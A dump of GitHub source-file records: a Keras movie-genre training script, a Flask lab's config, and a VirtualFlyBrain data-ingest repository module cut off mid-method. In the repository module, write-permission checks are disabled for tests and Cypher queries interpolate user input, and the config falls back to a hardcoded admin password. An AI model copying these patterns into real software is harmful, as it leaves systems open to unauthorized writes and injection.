ts.write(file_path + '\\n')\n\ndef create_list_of_frames(src_dir, dest_dir, train_dir):\n index_file_dir = os.path.join(dest_dir, \"index.txt\")\n\n if train_dir:\n sub_dir = os.path.join(src_dir, 'train')\n list_file_dir = os.path.join(dest_dir, \"list_train_data2.txt\")\n else:\n sub_dir = os.path.join(src_dir, 'test')\n list_file_dir = os.path.join(dest_dir, \"list_test_data2.txt\")\n\n class_dict = dict()\n with open(index_file_dir) as fo:\n for line in fo:\n class_index, class_name = line.split()\n class_dict[class_name] = class_index\n\n with open(list_file_dir, 'w') as file_list:\n for class_name in class_dict.keys():\n data_path = os.path.join(sub_dir, class_name)\n list_data = os.listdir(data_path)\n\n for i, file_name in enumerate(list_data):\n file_path = os.path.join(data_path, file_name)\n\n file_list.write(file_path + '\\n')\n\n\nif __name__ == '__main__':\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n src_dir = os.path.join(data_dir, 'Movie-dataset-preprocessed')\n #createListFiles(data_dir, 'Movie_samples', 'listdata')\n\n index = 'index.txt'\n\n #preprocess_listtxt(list_dir, index, 'train.txt', 'trainlist.txt')\n #preprocess_listtxt(list_dir, index, 'test.txt', 'testlist.txt')\n\n create_list_of_frames(src_dir, list_dir, train_dir=False)\n"
},
{
"alpha_fraction": 0.618681788444519,
"alphanum_fraction": 0.6348564624786377,
"avg_line_length": 37.640625,
"blob_id": "d97002446bb54e3c116cd7f91a5e3e6c2348f859",
"content_id": "4e82ad0adf82990db6d72d7bc35c29cd2af242fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2473,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 64,
"path": "/training_frames.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nimport keras.callbacks\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom generators import seq_generator, img_generator, get_data_list\nfrom models import finetuned_resnet, CNN\nfrom keras.optimizers import SGD\n\nCLASSES = 5\nBATCH_SIZE = 20\n\ndef fit_model(model, train_dir, test_dir, weights_dir, input_shape, optic=False):\n\n try:\n train_generator = ImageDataGenerator.flow_from_directory(train_dir,batch_size=20, class_mode='categorical')\n test_generator = ImageDataGenerator.flow_from_directory(test_dir, batch_size=20, class_mode='categorical')\n\n for data_batch, labels_batch in train_generator:\n print('data batch shape', data_batch.shape)\n print('labels batch shape', labels_batch.shape)\n break\n '''\n sgd = SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n print(model.summary())\n\n print('Start fitting model')\n\n while True:\n callbacks = [keras.callbacks.ModelCheckpoint(weights_dir, save_best_only=True, save_weights_only=True),\n keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0.001, patience=10, verbose=1, mode='auto'),\n keras.callbacks.TensorBoard(log_dir='.\\\\logs\\\\try', histogram_freq=0, write_graph=True, write_images=True)]\n model.fit_generator(\n train_generator,\n steps_per_epoch=100,\n epochs=30,\n validation_data=test_generator,\n validation_steps=25,\n verbose=1,\n callbacks=callbacks\n )\n print('finished')\n '''\n\n except KeyboardInterrupt:\n print(\"Training is intrrupted!\")\n\n\nif __name__ == '__main__':\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n weights_dir = os.getcwd()\n video_dir = os.path.join(data_dir, 'Movie-dataset-preprocessed')\n\n train_data = os.path.join(video_dir, 'train')\n test_data = os.path.join(video_dir, 'test')\n\n print(train_data)\n print(test_data)\n\n input_shape = (216, 216, 3)\n weights_dest = os.path.join(weights_dir, 'finetuned_resnet_RGB_frames_1.h5')\n #model = finetuned_resnet(include_top=True, weights_dir=weights_dest)\n #fit_model(model, train_data, test_data, weights_dest, input_shape)\n"
},
{
"alpha_fraction": 0.5897336006164551,
"alphanum_fraction": 0.5938168168067932,
"avg_line_length": 30.169696807861328,
"blob_id": "0908959770a159b45e312b36a8ee0cd326f004a2",
"content_id": "8c30587b4ea4779527b476a5714385bacf83d42f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5143,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 165,
"path": "/generators.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport random\nimport scipy.misc\n\ndef get_class_index(list_dir):\n class_index = dict()\n class_dir = os.path.join(list_dir, 'index.txt')\n with open(class_dir) as fo:\n for line in fo:\n class_number, class_name = line.split()\n class_number = int(class_number)\n class_index[class_name] = class_number\n return class_index\n\ndef get_data(list_dir):\n train_list_dir = os.path.join(list_dir, 'list_train_data2.txt')\n test_list_dir = os.path.join(list_dir, 'list_test_data2.txt')\n\n class_index = dict()\n class_dir = os.path.join(list_dir, 'index.txt')\n with open(class_dir) as fo:\n for line in fo:\n class_number, class_name = line.split()\n class_number = int(class_number)\n class_index[class_name] = class_number\n\n train_data = []\n\n count=0\n with open(train_list_dir) as trainlist:\n for i, clip in enumerate(trainlist):\n clip_class = os.path.basename(os.path.dirname(clip))\n train_data.append((clip, class_index[clip_class]))\n count+=1\n if count < 5:\n print(clip_class)\n\n test_data = []\n with open(test_list_dir) as testlist:\n for i, clip in enumerate(testlist):\n clip_class = os.path.basename(os.path.dirname(clip))\n test_data.append((clip, class_index[clip_class]))\n\n return train_data, test_data\n\n'''\ndef frame_generator(data_dir, batch_size):\n\n class_index = get_class_index()\n\n while True:\n\n\n\n yield\n'''\n\ndef seq_generator(datalist, batch_size, input_shape, num_classes):\n\n x_shape = (batch_size,) + input_shape\n y_shape = (batch_size, num_classes)\n index = 0\n\n while True:\n batch_x = np.ndarray(x_shape)\n batch_y = np.zeros(y_shape)\n\n for i in range(batch_size):\n step = random.randint(1, len(datalist) - 1)\n index = (index + step) % len(datalist)\n clip_dir, clip_class = datalist[index]\n batch_y[i, clip_class - 1] = 1\n clip_dir = os.path.splitext(clip_dir)[0] + '.npy'\n\n count = 0\n while not os.path.exists(clip_dir):\n count += 1\n if count > 20:\n raise FileExistsError('Too many file missing')\n index = (index + 1) % len(datalist)\n clip_dir, class_idx = datalist[index]\n clip_data = np.load(clip_dir)\n if clip_data.shape != batch_x.shape[1:]:\n raise ValueError('The number of time sequence is nconsistent with the video data')\n batch_x[i] = clip_data\n\n yield batch_x, batch_y\n\n\ndef img_generator(data_list, batch_size, input_shape, num_classes):\n\n batch_image_shape = (batch_size,) + input_shape[1:]\n batch_image = np.ndarray(batch_image_shape)\n\n video_gen = seq_generator(data_list, batch_size, input_shape, num_classes)\n\n while True:\n batch_video, batch_label = next(video_gen)\n for idx, video in enumerate(batch_video):\n sample_frame_idx = random.randint(0, input_shape[0] - 1)\n sample_frame = video[sample_frame_idx]\n batch_image[idx] = sample_frame\n\n yield batch_image, batch_label\n\ndef get_data_list(list_dir, video_dir):\n '''\n Input parameters:\n list_dir: 'root_dir/data/ucfTrainTestlist'\n video_dir: directory that stores source train and test data\n\n Return value:\n test_data/train_data: list of tuples (clip_dir, class index)\n class_index: dictionary of mapping (class_name->class_index)\n '''\n train_dir = os.path.join(video_dir, 'train')\n test_dir = os.path.join(video_dir, 'test')\n testlisttxt = 'testlist.txt'\n trainlisttxt = 'trainlist.txt'\n\n testlist = []\n txt_path = os.path.join(list_dir, testlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n testlist.append(line[:line.rfind(' ')])\n\n trainlist = []\n txt_path = os.path.join(list_dir, trainlisttxt)\n with open(txt_path) 
as fo:\n for line in fo:\n trainlist.append(line[:line.rfind(' ')])\n\n class_index = dict()\n class_dir = os.path.join(list_dir, 'index.txt')\n with open(class_dir) as fo:\n for line in fo:\n class_number, class_name = line.split()\n class_number = int(class_number)\n class_index[class_name] = class_number\n\n train_data = []\n for i, clip in enumerate(trainlist):\n clip_class = os.path.dirname(clip)\n dst_dir = os.path.join(train_dir, clip)\n train_data.append((dst_dir, class_index[clip_class]))\n\n test_data = []\n for i, clip in enumerate(testlist):\n clip_class = os.path.dirname(clip)\n dst_dir = os.path.join(test_dir, clip)\n test_data.append((dst_dir, class_index[clip_class]))\n\n return train_data, test_data, class_index\n\nif __name__ == '__main__':\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n src_dir = os.path.join(data_dir, 'Movie-dataset-preprocessed')\n\n r,s = get_data(list_dir)\n\n print(len(r))\n print(len(s))\n"
}
] | 7 |
krystanRamcharan/info3180-lab4
|
https://github.com/krystanRamcharan/info3180-lab4
|
c94c6d8d6dbb0e419fff911f9e93f480b8805606
|
1963519887645e83a000735d25d1b4534f09195f
|
7a005b996bb7aeaef4e70aac7f84724506a780ec
|
refs/heads/master
| 2022-03-11T08:43:37.737368 | 2022-02-28T01:41:25 | 2022-02-28T01:41:25 | 242,217,896 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4848484992980957,
"alphanum_fraction": 0.6848484873771667,
"avg_line_length": 15.5,
"blob_id": "1f926990364d0c7d8f39353848d4d64aa5a9e732",
"content_id": "3f0b8ed72f3c81b9aa0392cbc4443f0f030dabfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 165,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 10,
"path": "/requirements.txt",
"repo_name": "krystanRamcharan/info3180-lab4",
"src_encoding": "UTF-8",
"text": "click==8.0.4\nFlask==2.0.3\nFlask-WTF==1.0.0\ngunicorn==20.1.0\nitsdangerous==2.1.0\nJinja2==3.0.3\nMarkupSafe==2.1.0\npython-dotenv==0.19.2\nWerkzeug==2.0.3\nWTForms==3.0.1\n"
},
{
"alpha_fraction": 0.663239061832428,
"alphanum_fraction": 0.6683804392814636,
"avg_line_length": 31,
"blob_id": "0d7171c8ee1cee7d26bb1a48c3a2a25fbfcd6f1a",
"content_id": "706fb03e0ec0c6fb58dcbd5012b37c8346182cb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 389,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 12,
"path": "/app/config.py",
"repo_name": "krystanRamcharan/info3180-lab4",
"src_encoding": "UTF-8",
"text": "import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass Config(object):\n \"\"\"Base Config Object\"\"\"\n DEBUG = False\n SECRET_KEY = os.environ.get('SECRET_KEY', 'Som3$ec5etK*y')\n ADMIN_USERNAME = os.environ.get('ADMIN_USERNAME', 'admin')\n ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', 'passcode2222')\n UPLOAD_FOLDER =os.environ.get('UPLOAD_FOLDER', './uploads')\n \n"
}
] | 2 |
VirtualFlyBrain/vfb-data-ingest-api
|
https://github.com/VirtualFlyBrain/vfb-data-ingest-api
|
68ff54bd54486c2170e125ddfbcd3d515e321662
|
96ae3b264c882b6dba08d68061ace346e095356c
|
84f9ec6399e506bd6c94533b5d6a133e857528d7
|
refs/heads/master
| 2023-05-13T18:49:36.888984 | 2022-08-22T08:07:10 | 2022-08-22T08:07:10 | 172,968,394 | 0 | 0 |
NOASSERTION
| 2019-02-27T18:31:35 | 2022-03-01T08:46:09 | 2023-05-03T19:04:42 |
Python
|
[
{
"alpha_fraction": 0.5534486174583435,
"alphanum_fraction": 0.5607443451881409,
"avg_line_length": 41.79917526245117,
"blob_id": "981a10dbd896de85b0c284715b9260334ebb1674",
"content_id": "af9f1293f8c7540663afd9f79495b86c62d6859e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31114,
"license_type": "permissive",
"max_line_length": 209,
"num_lines": 727,
"path": "/vfb_curation_api/database/repository/repository.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "from neo4jrestclient.client import GraphDatabase\nfrom vfb_curation_api.database.models import Neuron, Dataset, Project, User, Split, SplitDriver\nfrom vfb_curation_api.api.vfbid.errorcodes import NO_PERMISSION, INVALID_NEURON, UNKNOWNERROR, INVALID_DATASET, INVALID_SPLIT\nimport os\nimport json\nimport requests\nimport tempfile\nfrom vfb_curation_api.vfb.uk.ac.ebi.vfb.neo4j.neo4j_tools import neo4j_connect\nfrom vfb_curation_api.vfb.uk.ac.ebi.vfb.neo4j.KB_tools import KB_pattern_writer\nfrom vfb_curation_api.vfb.uk.ac.ebi.vfb.neo4j.KB_tools import kb_owl_edge_writer\nfrom vfb_curation_api.vfb.uk.ac.ebi.vfb.neo4j.flybase2neo.feature_tools import FeatureMover, split\n\nclass VFBKB():\n def __init__(self):\n self.db = None\n self.kb_owl_pattern_writer = None\n self.feature_mover = None\n self.max_base36 = 1679615 # Corresponds to the base36 value of ZZZZZZ\n self.db_client = \"vfb\"\n self.client_id = os.environ['CLIENT_ID_AUTHORISATION']\n self.client_secret = os.environ['CLIENT_SECRET_AUTHORISATION']\n self.redirect_uri = os.environ['REDIRECT_URI_AUTHORISATION']\n self.authorisation_token_endpoint = os.environ['ENDPOINT_AUTHORISATION_TOKEN']\n\n\n ######################\n #### Core methods ####\n ######################\n\n def init_db(self):\n if not self.db:\n self.kb = os.getenv('KBserver')\n self.user = os.getenv('KBuser')\n self.password = os.getenv('KBpassword')\n try:\n if self.db_client==\"vfb\":\n self.db = neo4j_connect(self.kb, self.user, self.password)\n self.kb_owl_pattern_writer = KB_pattern_writer(self.kb, self.user, self.password)\n self.kb_owl_edge_writer = kb_owl_edge_writer(self.kb, self.user, self.password)\n self.feature_mover = FeatureMover(self.kb, self.user, self.password, tempfile.gettempdir())\n else:\n self.db = GraphDatabase(self.kb, username=self.user, password=self.password)\n self.prepare_database()\n if os.getenv('LOAD_TEST_DATA'):\n self.load_test_data()\n return True\n except Exception as e:\n print(\"Database could not be initialised: {}\".format(e))\n return False\n else:\n return True\n\n def prepare_database(self):\n q_orcid_unique = \"CREATE CONSTRAINT ON (a:Person) ASSERT a.orcid IS UNIQUE\"\n q_projectid_unique = \"CREATE CONSTRAINT ON (a:Project) ASSERT a.projectid IS UNIQUE\"\n self.query(q_orcid_unique)\n self.query(q_projectid_unique)\n\n def load_test_data(self):\n test_cypher_path = os.path.normpath(os.path.join(os.path.dirname(__file__), '../testdata.cypher'))\n with open(test_cypher_path, 'r') as file:\n q_test_data = file.read()\n self.query(q_test_data)\n\n def parse_vfb_client_data(self, data_in):\n data = []\n for d_in in data_in:\n #print(d_in)\n columns = d_in['columns']\n #print(columns)\n for rec in d_in['data']:\n d = dict()\n print(rec)\n for i in range(len(columns)):\n print(i)\n d[columns[i]]=rec['row'][i]\n data.append(d)\n #print(\"DATAOUT: \" + str(data))\n return data\n\n def parse_neo4j_default_client_data(self, data_in):\n #print(\"DATAIN: \" + str(data_in.rows))\n data = []\n columns = []\n if data_in.rows:\n for c in data_in.rows[0]:\n columns.append(c)\n #print(str(columns))\n if data_in.rows:\n for d_row in data_in.rows:\n d = dict()\n for c in columns:\n d[c] = d_row[c]\n data.append(d)\n #print(\"DATAOUT: \" + str(data))\n return data\n\n def query(self,q):\n print(\"Q: \"+str(q))\n if self.init_db():\n if self.db_client == \"vfb\":\n x = self.parse_vfb_client_data(self.db.commit_list([q]))\n else:\n x = self.parse_neo4j_default_client_data(self.db.query(q,data_contents=True))\n return x\n else:\n raise 
DatabaseNotInitialisedError(\"Database not initialised!\")\n\n def authenticate(self, code, redirect_uri):\n data = {'client_id': self.client_id,\n 'client_secret': self.client_secret,\n 'grant_type': 'authorization_code',\n 'code': \"{}\".format(code),\n 'redirect_uri': redirect_uri }\n #print(data)\n # sending post request and saving response as response object\n r = requests.post(url=self.authorisation_token_endpoint, data=data)\n #print(r.text)\n d = json.loads(r.text)\n # {\"access_token\",\"token_type\",\"refresh_token\",\"expires_in\",\"scope\",\"name\":\"Nicolas Matentzoglu\",\"orcid\":\"0000-0002-7356-1779\"}\n orcid = \"https://orcid.org/{}\".format(d['orcid'])\n return self.get_user(orcid)\n\n ################################\n #### Data retrieval ############\n ################################\n\n # Labels:\n # n: project\n # p: person\n # d: dataset\n # i: neuron\n\n\n def valid_user(self, apikey, orcid):\n if self.get_user(orcid, apikey):\n return True\n return False\n\n def _get_project_permission_clause(self, orcid, project=None):\n # q = \"MATCH (n:Project \"\n # if project:\n # q = q + \"{iri:'%s'}\" % self._format_vfb_id(project,\"project\")\n # q = q + \")<-[:has_admin_permissions]-(p:Person {iri: '%s'}) \" % orcid\n # return q\n\n # TODO disabled permission check for end2end tests\n q = \"MATCH (n:Project \"\n if project:\n q = q + \"{iri:'%s'}\" % self._format_vfb_id(project,\"project\")\n q = q + \") \"\n return q\n\n def _get_project_return_clause(self):\n return \" RETURN n.iri as id, n.short_form as short_name, n.label as primary_name, n.start as start, n.description as description\"\n\n def _get_dataset_permission_clause(self, orcid, datasetid=None, project=None, extra_dataset=False):\n q = self._get_project_permission_clause(orcid,project)\n q = q + \"MATCH (n)<-[:has_associated_project]-(d:DataSet \"\n if datasetid:\n q = q + \"{iri: '%s'}\" % self._format_vfb_id(datasetid, \"reports\")\n q = q + \") \";\n if extra_dataset:\n q = q + \"OPTIONAL MATCH (d)-[:has_license]-(l:License) \"\n q = q + \"OPTIONAL MATCH (d)-[:has_reference]-(pu:pub) \"\n return q\n\n def _get_dataset_return_clause(self):\n return \" RETURN d.iri as id, d.short_form as short_form, d.label as title, d.description as description, d.dataset_link as source_data, l.iri as license, pu.iri as publication, n.short_form as project\"\n\n def _get_neuron_permission_clause(self, orcid, neuronid=None, datasetid=None,project=None):\n q = self._get_dataset_permission_clause(orcid,datasetid,project)\n q = q + \"MATCH (i \"\n if neuronid:\n q = q + \"{iri: '%s'}\" % self._format_vfb_id(neuronid, \"reports\")\n q = q + \")-[:has_source]->(d) \"\n return q\n\n\n def _format_vfb_id(self,id,type):\n if id.startswith(\"http:\"):\n nid = id\n else:\n nid = \"http://virtualflybrain.org/{}/{}\".format(type, id)\n return nid\n\n def _add_result_to_map_if_not_exists(self,item, map,key):\n if key not in map:\n map[key] = []\n if item not in map[key]:\n if isinstance(item, list):\n map[key].extend(item)\n else:\n map[key].append(item)\n return map\n\n def _get_neuron_relations(self,neuronid):\n q = \"MATCH (i {iri: '%s'})-[r]-(q) \" % self._format_vfb_id(neuronid,\"reports\")\n q = q + \"\"\"\nMATCH (i)-[cli:INSTANCEOF]-(cl:Class)\nMATCH (i)-[ {iri:\"http://xmlns.com/foaf/0.1/depicts\"}]-(c:Individual) \nMATCH (c)-[ir:in_register_with]-(t:Template)\nMATCH (c)-[ {iri:\"http://purl.obolibrary.org/obo/OBI_0000312\"}]-(it) \nOPTIONAL MATCH (i)-[cr:database_cross_reference]-(xref:Site)\nOPTIONAL MATCH (i)-[ 
{iri:\"http://purl.obolibrary.org/obo/BFO_0000050\"}]-(po) \nOPTIONAL MATCH (i)-[ {iri:\"http://purl.obolibrary.org/obo/RO_0002292\"}]-(dl) \nOPTIONAL MATCH (i)-[ {iri:\"http://purl.obolibrary.org/obo/RO_0002131\"}]-(np)\nOPTIONAL MATCH (i)-[ {iri:\"http://purl.obolibrary.org/obo/RO_0002110\"}]-(inp) \nOPTIONAL MATCH (i)-[ {iri:\"http://purl.obolibrary.org/obo/RO_0002113\"}]-(onp) \nRETURN xref.short_form as resource_id, \ncr.accession as external_id, \nt.short_form as template_id, \nir.filename as filename, \nit.label as imaging_type, \ncl.iri as classification, \ncli.comment as classification_comment, \ncollect(DISTINCT po.short_form) as part_of, \ncollect(DISTINCT dl.short_form) as driver_line, \ncollect(DISTINCT np.short_form) as neuropils, \ncollect(DISTINCT inp.short_form) as input_neuropils,\ncollect(DISTINCT onp.short_form) as output_neuropils\"\"\"\n rels = {}\n results = self.query(q=q)\n if not results:\n raise VFBError(\"Neuron does not exist, or could not be retrieved.\")\n for r in results:\n d = dict()\n d['resource_id'] = r['resource_id']\n d['external_id'] = r['external_id']\n rels = self._add_result_to_map_if_not_exists(d, rels, \"cross_references\")\n for i in [\"neuropils\", \"input_neuropils\",\n \"output_neuropils\",\"driver_line\",\"part_of\"]:\n rels = self._add_result_to_map_if_not_exists(r[i], rels, i)\n for i in [\"classification\",\"classification_comment\",\n \"imaging_type\", \"filename\", \"template_id\"]:\n rels[i] = r[i] # This assumes there is really just one match. Which there is if the KB is consistent\n return rels\n\n def _get_neuron_return_clause(self):\n return \" RETURN i.iri as id, i.label as primary_name, n.iri as projectid, d.iri as datasetid, i.synonyms as syns\"\n\n def has_project_write_permission(self, project, orcid):\n if self.get_project(project,orcid):\n return True\n return False\n\n def has_dataset_write_permission(self, datasetid, orcid):\n # if self.get_dataset(datasetid, orcid):\n # return True\n # return False\n\n # TODO disabled permission checks for end2end tests\n return True\n\n def _marshal_project_from_neo(self, data):\n p = Project(id=data['short_name'])\n p.set_description(data['description'])\n p.set_start(data['start'])\n p.set_primary_name(data['primary_name'])\n return p\n\n def get_project(self, id, orcid):\n q = self._get_project_permission_clause(orcid,id) + self._get_project_return_clause()\n results = self.query(q=q)\n if len(results) == 1:\n p = self._marshal_project_from_neo(results[0])\n return p\n return None\n\n\n def get_dataset(self, id, orcid):\n q = self._get_dataset_permission_clause(orcid, id,extra_dataset=True) + self._get_dataset_return_clause()\n results = self.query(q=q)\n if len(results) == 1:\n d = self._neo_dataset_marshal(results[0])\n return d\n return None\n\n def _get_neuron(self, id, orcid):\n q = self._get_neuron_permission_clause(orcid,id)\n q = q + self._get_neuron_return_clause()\n results = self.query(q=q)\n if len(results) == 1:\n try:\n n = Neuron(primary_name=results[0]['primary_name'])\n n.set_id(id=results[0]['id'])\n n.set_alternative_names(results[0]['syns'])\n n.set_datasetid(results[0]['datasetid'])\n n.set_project_id(results[0]['projectid'])\n neuron_rels = self._get_neuron_relations(results[0]['id'])\n n.set_external_identifiers(neuron_rels['cross_references'])\n n.set_classification([neuron_rels['classification']])\n n.set_classification_comment(neuron_rels['classification_comment'])\n n.set_imaging_type(neuron_rels['imaging_type'])\n 
n.set_neuropils(neuron_rels['neuropils'])\n n.set_input_neuropils(neuron_rels['input_neuropils'])\n n.set_output_neuropils(neuron_rels['output_neuropils'])\n n.set_driver_line(neuron_rels['driver_line'])\n n.set_part_of(neuron_rels['part_of'])\n n.set_filename(neuron_rels['filename'])\n n.set_template_id(neuron_rels['template_id'])\n except Exception as e:\n print(e)\n return self.wrap_error([\"Neuron {} could not be retrieved\".format(id)], INVALID_NEURON)\n return n\n return self.wrap_error([\"Neuron {} could not be retrieved\".format(id)], INVALID_NEURON)\n\n def get_neuron(self, id, orcid):\n if isinstance(id,list):\n neurons = []\n for i in id:\n neurons.append(self._get_neuron(i,orcid))\n return neurons\n else:\n return self._get_neuron(id,orcid)\n\n def get_user(self, orcid, apikey=None):\n q = \"MATCH (p:Person {iri:'%s'\" % orcid\n if apikey:\n q = q + \", apikey: '%s'\" % apikey\n q = q + \"}) RETURN p.iri as id, p.label as primary_name, p.apikey as apikey, p.role as role, p.email as email\"\n results = self.query(q=q)\n if len(results) == 1:\n return User(results[0]['id'], results[0]['primary_name'], results[0]['apikey'],\n results[0]['role'], results[0]['email'])\n raise InvalidUserException(\"User with orcid id {} does not exist.\".format(orcid))\n\n def _neo_dataset_marshal(self,row):\n d = Dataset(id=row['id'], short_name=row['short_form'], title=row['title'])\n d.set_project_id(row['project'])\n d.set_publication(row['publication'])\n d.set_source_data(row['source_data'])\n d.set_description(row['description'])\n d.set_license(row['license'])\n return d\n\n def get_all_datasets(self,projectid, orcid):\n q = self._get_dataset_permission_clause(orcid=orcid, project=projectid, extra_dataset=True) + self._get_dataset_return_clause()\n results = self.query(q=q)\n datasets = []\n for row in results:\n #print(row)\n d = self._neo_dataset_marshal(row)\n datasets.append(d)\n return datasets\n\n def get_all_projects(self,orcid):\n q = self._get_project_permission_clause(orcid=orcid) + self._get_project_return_clause()\n results = self.query(q=q)\n projects = []\n for row in results:\n projects.append(self._marshal_project_from_neo(row))\n return projects\n\n def get_all_neurons(self, datasetid, orcid):\n q = self._get_neuron_permission_clause(orcid=orcid) + self._get_neuron_return_clause()\n results = self.query(q=q)\n neurons = []\n for row in results:\n # n = Neuron(primary_name=row['primary_name'], id=row['id'])\n # n.set_datasets([datasetid])\n n = Neuron(primary_name=row['primary_name'])\n n.set_id(row['id'])\n n.set_datasetid(datasetid)\n n.set_project_id(row['projectid'])\n neurons.append(n)\n return neurons\n\n def get_id_start_range(self, datasetid, orcid):\n q = self._get_dataset_permission_clause(orcid=orcid,datasetid=datasetid) + self._get_project_return_clause()\n results = self.query(q=q)\n if len(results) == 1:\n return results[0]['start']\n raise VFBError(\"No start range found for dataset {}, starting from 0.\".format(datasetid))\n\n ################################\n #### Data ingestion ############\n ################################\n\n def create_dataset(self, Dataset, project, orcid):\n errors = []\n if self.has_project_write_permission(project, orcid):\n if self.db_client==\"vfb\":\n datasetid = self.kb_owl_pattern_writer.add_dataSet(Dataset.title, Dataset.license, Dataset.short_name, pub=Dataset.publication,\n description=Dataset.description, dataset_spec_text='', site='')\n self.kb_owl_pattern_writer.commit()\n print(\"Determining success of added dataset by 
checking whether the log is empty.\")\n datasetid = Dataset.short_name\n if not self.kb_owl_pattern_writer.ec.log:\n q = \"MATCH (n:Project {iri: '%s'})\" % self._format_vfb_id(project,\"project\")\n q = q + \" MATCH (d:DataSet {iri: '%s'})\" % self._format_vfb_id(datasetid,\"reports\")\n q = q + \" MERGE (n)<-[:has_associated_project]-(d)\"\n print(q)\n result = self.query(q)\n print(result)\n return datasetid\n else:\n print(\"Added dataset: error log is not empty.\")\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n return self.wrap_error(errors, INVALID_DATASET)\n else:\n raise IllegalProjectError(\n 'The project %s does not exist, or user with orcid %s does not have the required permissions. '\n 'Please send an email to [email protected] to register your project.' % (project, orcid))\n errors.append(\"An unknown error occurred\")\n return self.wrap_error(errors, UNKNOWNERROR)\n\n def create_neuron_db(self, neurons, datasetid, orcid):\n commit = True\n ids = []\n errors = []\n start = 0\n\n did = self._format_vfb_id(datasetid, \"reports\")\n if not self.has_dataset_write_permission(did, orcid):\n return self.wrap_error(\"No permissions to add images to datasets\", NO_PERMISSION)\n\n s = self.get_id_start_range(datasetid, orcid)\n if s > start:\n start = s\n for neuron in neurons:\n if isinstance(neuron, Neuron):\n try:\n success = self.add_neuron_db(neuron, datasetid, start)\n if success:\n ids.append(success)\n else:\n commit = False\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n except Exception as e:\n commit = False\n print(e)\n errors.append(\"{}\".format(e))\n else:\n print(\"{} is not a neuron\".format(neuron))\n if commit:\n commit_return = self.kb_owl_pattern_writer.commit()\n if commit_return:\n return ids\n else:\n errors.extend(self.kb_owl_pattern_writer.get_log())\n return self.wrap_error(errors, INVALID_NEURON)\n else:\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n return self.wrap_error(errors, INVALID_NEURON)\n\n\n def add_neuron_db(self, Neuron, datasetid, start):\n # make sure datasetid is the short form.\n\n if self.db_client==\"vfb\":\n rv = self.kb_owl_pattern_writer.add_anatomy_image_set(\n dataset=datasetid,\n imaging_type=Neuron.imaging_type,\n label=Neuron.primary_name,\n start=start, # we need to do this on api level so that batching is not a bottleneck. 
we dont want 1 lookup per new image just to get the range!\n template=Neuron.template_id, #VFB id or template name\n anatomical_type=Neuron.classification[0], #default NEURON VFB/FBBT ID (short_form).\n type_edge_annotations={\"comment\": Neuron.classification_comment},\n anon_anatomical_types=self.get_anon_anatomical_types(Neuron),\n anatomy_attributes=self.get_anatomy_attributes(Neuron),\n dbxrefs=self.get_xrefs(Neuron.external_identifiers),\n image_filename=Neuron.filename,\n hard_fail=False)\n return rv['anatomy']['short_form']\n\n raise VFBError('Images cannot be added right now; please contact the VFB administrators.')\n\n def get_anatomy_attributes(self, neuron):\n aa = dict()\n if isinstance(neuron, Neuron) or isinstance(neuron, SplitDriver):\n syns = neuron.alternative_names\n if syns:\n # {\"synonyms\": ['a','b]}\n aa['synonyms'] = syns\n if neuron.comment:\n aa['comment'] = neuron.comment\n return aa\n\n def get_anon_anatomical_types(self, neuron):\n # [(r,o),(r2,o2)]\n aa = []\n if isinstance(neuron, Neuron) or isinstance(neuron, SplitDriver):\n aa = self._add_type(neuron.part_of, \"BFO_0000050\",aa)\n aa = self._add_type(neuron.driver_line, \"RO_0002292\", aa)\n aa = self._add_type(neuron.neuropils, \"RO_0002131\", aa)\n aa = self._add_type(neuron.input_neuropils, \"RO_0002110\", aa)\n aa = self._add_type(neuron.output_neuropils, \"RO_0002113\", aa)\n return aa\n\n def _add_type(self, n_typ, rel, l):\n if n_typ and isinstance(n_typ,list):\n for e in n_typ:\n l.append((rel,e))\n return l\n\n def get_xrefs(self, xrefs):\n aa = dict()\n if xrefs:\n # { GO: 001 }\n for xref in xrefs:\n aa[xref['resource_id']] = xref['external_id']\n return aa\n\n def create_project_db(self, Project):\n raise IllegalProjectError(\n 'Creating projects is currently not supported.')\n\n def create_neuron_type_db(self, Project):\n raise IllegalProjectError(\n 'Creating new neuron types is currently not supported.')\n\n def wrap_error(self,message_json,code):\n return { 'error': {\n \"code\": code,\n \"message\": message_json,\n }}\n\n def clear_neo_logs(self):\n self.kb_owl_pattern_writer.get_log()\n self.self.kb_owl_pattern_writer.ec.log\n\n def _get_split(self, splitid, orcid):\n q = \"MATCH (i \"\n if splitid:\n q = q + \"{iri: '%s'})\" % self._format_vfb_id(splitid, \"reports\")\n q = q + \" RETURN i.iri as id, i.label as label, i.synonyms as syns, i.xrefs as xrefs\"\n\n results = self.query(q=q)\n if len(results) == 1:\n try:\n s = Split(\"\", \"\")\n 